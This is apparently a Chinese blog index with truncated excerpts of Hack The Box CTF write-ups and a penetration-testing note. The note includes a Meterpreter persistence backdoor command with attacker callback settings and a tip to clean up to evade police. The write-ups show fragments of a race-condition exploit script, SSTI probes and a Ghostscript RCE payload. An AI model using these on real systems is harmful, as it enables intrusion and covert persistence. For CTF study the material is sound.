第二章
# 渗透测试 外围打点对我没有什么价值,直接无脑梭哈 后渗透有些参考 当植入 meterpreter 后需要植入后门 run persistence -X -i 5 -p 443 -r 127.0.0.1命令语法: A:自动启动Payload程序S:系统登录时自动加载U:用户登录时自动启动X:开机时自动加载i:回连的时间间隔P:攻击者监听反向连接端口号r:攻击者机器 IP 地址(攻击主机)留下后门后会重置当前 session 为后门会话 可以通过使用 exploit/multi/hadler 进行监听,从而重新获得会话。 撤离的时候需要执行一些清理操作,以免被查水表 #...
more...HTB-AbuseHumanDB题解
# 信息收集 源码 down 下来就开始审阅呗,全是 js。比较重要的就是 /route/index.js 和 database.js 以及 bot.js /route/index.js const bot = require('../bot');const path = require('path');const express = require('express');const router = express.Router();const response = data => ({ message: data...
more...HTB-Diogenes' Rage题解
# 信息收集 直接看源码了 Js 中使用了 async 进行异步操作 那么用条件竞争 # Payload # Python program to illustrate# the concept of race condition# in multiprocessingimport multiprocessingimport requestsimport timedef exploit(u, d, h): for i in range(5): requests.post(u, data=d, headers=h)def perform_transactions(cookie,...
more...HTB-LoveTok题解
# 0x01 信息收集 index.php 调用 TimeControler ,然后传参 format 给 TimeModel ,接着进行 ```addslashes () 函数调用,然后调用 getTime () ,里面有一个 eval` 命令执行,这也就是漏洞所在! TimeModel <?php class TimeModel{ public function __construct($format) { $this->format = addslashes($format); [ $d, $h, $m, $s ] = [...
more...HTB-Template题解
# 0x01 信息收集 启动机器,访问目标 157.245.42.82:30461 搜索 Proudly powered by Flask/Jinja2 看看能得到什么信息 通过搜索可以知道这个 Flask 有一个 SSTI 服务端模板注入 类似于 XSS,就是通过输入特定的字符串构成模板的一部分,后端进行渲染的时候就会造成攻击 我们访问一下资源,验证下是不是存在 SSTI 访问 # 访问http://157.245.42.82:30461/=9http://157.245.42.82:30461/=9发现都返回了错误,代表 SSTI 存在 那么我们可以通过 python...
more...HTB-Toxic题解
# 信息收集 查看源代码发现 cookie 是 page 通过序列化后 base64 加密生成生成的 <?phpspl_autoload_register(function ($name){ if (preg_match('/Model$/', $name)) { $name = "models/${name}"; } include_once "${name}.php";});if...
more...HTB-Neonify题解
# 信息收集 根本不会啊我真是日了狗了,只好去查资料 一个韩国姐姐是真的牛逼 原文地址:https://domdom.tistory.com/entry/Hackthebox-Neonify-Writeup%EB%AC%B8%EC%A0%9C%ED%92%80%EC%9D%B4 SSTI 的详细讲解:https://www.anquanke.com/post/id/188172 查看源码是 Ruby SSTI 14 行使用了正则表达式进行检查 在第 15 行,可以看到 neon 参数的值绑定到名为 ERB 的 Ruby 模板,并呈现为名为 index 的 html...
more...HTB-petpet rcbee题解
# 0x01 信息收集 这个进去一看明显就是一个文件上传 ==、 通过 docker 文件可以知道使用的是 ghostscript-9.23 这个有一个 RCE 漏洞 # Payload 上传图片的时候把这个替换进去 %!PS-Adobe-3.0 EPSF-3.0%%BoundingBox: -0 -0 100 100userdict /setpagedevice undefsavelegal{ null restore } stopped { pop } if{ legal }...
more...